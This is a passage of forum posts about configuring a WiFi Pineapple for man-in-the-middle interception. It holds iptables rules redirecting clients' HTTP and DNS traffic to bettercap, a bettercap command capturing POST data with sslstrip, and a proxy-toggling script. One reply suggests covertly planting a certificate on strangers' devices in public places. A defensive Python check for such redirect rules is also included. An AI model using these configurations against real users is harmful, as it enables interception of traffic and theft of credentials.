Posts posted by M@s0n

  1. On 3/2/2016 at 11:49 AM, cyberbitz said:

    Ok, Thanks MarcSThe1st. I will hold off on using that. I have created a startup script to enable the landing page which works. However, getting it to work is tricky at times. I don't have much time today to look into it and I am not a pineapple expert so I am learning while digging into the code.

    What is reproducible is WiFi Client Mode connected to internet the landing page works. If I disconnect WiFi client mode the landing page does not work, so I can't broadcast SSIDs from PineAP and have the landing page work (consistently). I believe that it may be a routing issue.

    So I got everything working, but I'm still having the same issue --> What is reproducible is WiFi Client Mode connected to internet the landing page works. If I disconnect WiFi client mode the landing page does not work, so I can't broadcast SSIDs from PineAP and have the landing page work (consistently). I believe that it may be a routing issue.

    Has anybody come up with a fix for this?

  2. On 6/18/2017 at 2:13 AM, PoSHMagiC0de said:

    Thanks for all the responses.  May have to look into the cooling idea.  I think I may use that extra nic for my raspberry pi as a low power solution as I figured out the bettercap thing.  The solution came from another solution to use Burp to capture the traffic from the pineapple.

    http://hackedexistence.com/project/wifi-pineapple/wifi-pineapple-mk5-with-burp-proxy.html

    Judging by the script, he must be using one of the tetras so ignore his changes.  The bottom part is what I did after I ran the wp6.sh script.

    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    

    Cool thing about this is it doesn't break ICS.  I made a bash script in the same directory I keep the wp6 script and run it when I want to use Bettercap to mitm clients on the Nano.

    Parameters I use with bettercap are:

    
    bettercap -I eth1 --no-spoofing --no-discovery --gateway 192.168.1.1 --proxy -P POST
    

    The gateway IP is the IP of the gateway I am sharing internet through.  eth1 is the interface the Nano is on.

    I was shocked when I saw requests.  Even sslstripping was working.

     

    I didn't know it was going to work but I tried it anyway and did start seeing DNS requests.

    
    iptables -t nat -A PREROUTING -p tcp --destination-port 53 -j REDIRECT --to-port 5300
    

    Of course you can redirect 443 to bettercap's https listening port but unless you have its cert on the victim, they will get cert warnings as in any https proxying.  Possibility with this is to use a BashBunny with some of its payloads to add your cert while they are not looking at a public place using a public wifi and get their MAC.  Then you can go back and target them with pineapple to try and get them to connect to you.

    Awesome! Thanks so much for the reply on my thread. This is exactly what I was looking for.

  3. Hi everyone,

    I use the Wi-Fi Pineapple as a man-in-the-middle device, redirecting all traffic to a laptop that the Wi-Fi Pineapple is tethered to, similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/

    So here's my setup:

    MacBook running a Linux VM (VirtualBox), connected via USB to the Wi-Fi Pineapple that's sending all traffic to the VirtualBox machine.

    Pardon my diagram skills :(

    Here is the script that I have created based off of the post above. However, I don't think this is ideal, since you would need to SSH into the Pineapple to run this script every time. Ideally it would be best to do this via the web interface of the Pineapple via a simple "enable proxy" button etc. Any feedback would be appreciated.

     

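    #!/bin/bash
    # Toggle the NAT rules that send clients' HTTP traffic to the proxy on the tethered host.

    if [[ $# -eq 0 ]] ; then
        echo "Usage: $0 (enable|disable)"
        exit 1
    fi

    action="$1"
    case "$action" in
        enable)
          echo "Enabling ..."
          # Rewrite the destination of port-80 traffic to the proxy at 172.16.42.42:8080.
          iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
          #iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
          # Source-NAT outgoing traffic so replies come back through the Pineapple.
          iptables -t nat -A POSTROUTING -j MASQUERADE
        ;;
        disable)
          echo "Disabling ..."
          iptables -t nat -D PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
          #iptables -t nat -D PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083
          # Remove the MASQUERADE rule appended by "enable" so repeated toggling leaves no stale copies.
          iptables -t nat -D POSTROUTING -j MASQUERADE
        ;;
        *)
          echo "Usage: $0 (enable|disable)"
          exit 1
        ;;
    esac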

     

    Screen Shot 2017-04-20 at 3.43.38 PM.png
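
Added example, not part of the original post or of any Hak5 tooling: a Python check that parses `iptables-save` output and flags nat-table PREROUTING rules of the kind the script above installs, that is, DNAT or REDIRECT of ports 53, 80 or 443. The sample ruleset, the watched-port set and the function name `find_intercept_rules` are constructed for illustration.

```python
import shlex

# Ports the thread redirects or mentions: DNS (53), HTTP (80), HTTPS (443).
WATCHED_PORTS = {"53", "80", "443"}
NAT_TARGETS = {"DNAT", "REDIRECT"}

# Constructed sample of `iptables-save` output (not captured from a real device).
SAMPLE = """\
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080
-A PREROUTING -p tcp -m tcp --dport 53 -j REDIRECT --to-ports 5300
-A PREROUTING -p tcp -m tcp --dport 22 -j DNAT --to-destination 172.16.42.10:22
-A POSTROUTING -j MASQUERADE
COMMIT
*filter
:INPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
COMMIT
"""


def find_intercept_rules(save_text):
    """Return nat PREROUTING rules that DNAT/REDIRECT a watched port."""
    findings, table = [], None
    for raw in save_text.splitlines():
        line = raw.strip()
        if line.startswith("*"):          # "*nat", "*filter": table header
            table = line[1:]
            continue
        if table != "nat" or not line.startswith("-A PREROUTING "):
            continue
        tokens = shlex.split(line)
        # Map each option to the token that follows it.
        opts = {t: tokens[i + 1] for i, t in enumerate(tokens[:-1]) if t.startswith("-")}
        # Single port (--dport) or a multiport list (--dports 80,443).
        ports = opts.get("--dport") or opts.get("--dports") or ""
        hit = WATCHED_PORTS.intersection(ports.split(","))
        if opts.get("-j") in NAT_TARGETS and hit:
            dest = opts.get("--to-destination") or opts.get("--to-ports")
            findings.append({"ports": sorted(hit, key=int), "target": opts["-j"],
                             "to": dest, "rule": line})
    return findings


if __name__ == "__main__":
    for f in find_intercept_rules(SAMPLE):
        print(f"{f['target']} of port(s) {','.join(f['ports'])} -> {f['to']}")
```

Feeding it the live output of `iptables-save` from a gateway shows whether any such redirect is still in place after a test setup was meant to be torn down.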

  4. In the meantime, just did a forced recovery.

     On 3/8/2017 at 4:42 AM, Darren Kitchen said:

    Restore the Bash Bunny from the recovery partition:

    1. Set the Bash Bunny switch to position 3 (arming mode)
    2. Plug the Bash Bunny into a USB power source. The LED will momentarily light green. As soon as the LED goes off, unplug the Bash Bunny.
    3. Repeat the previous step twice more (for a total of 3 times)
    4. Plug the Bash Bunny into a USB power source and leave for 4 minutes. The LED will light RED to indicate recovery. When the light returns to BLUE blinking, the Bash Bunny has recovered.

     

     
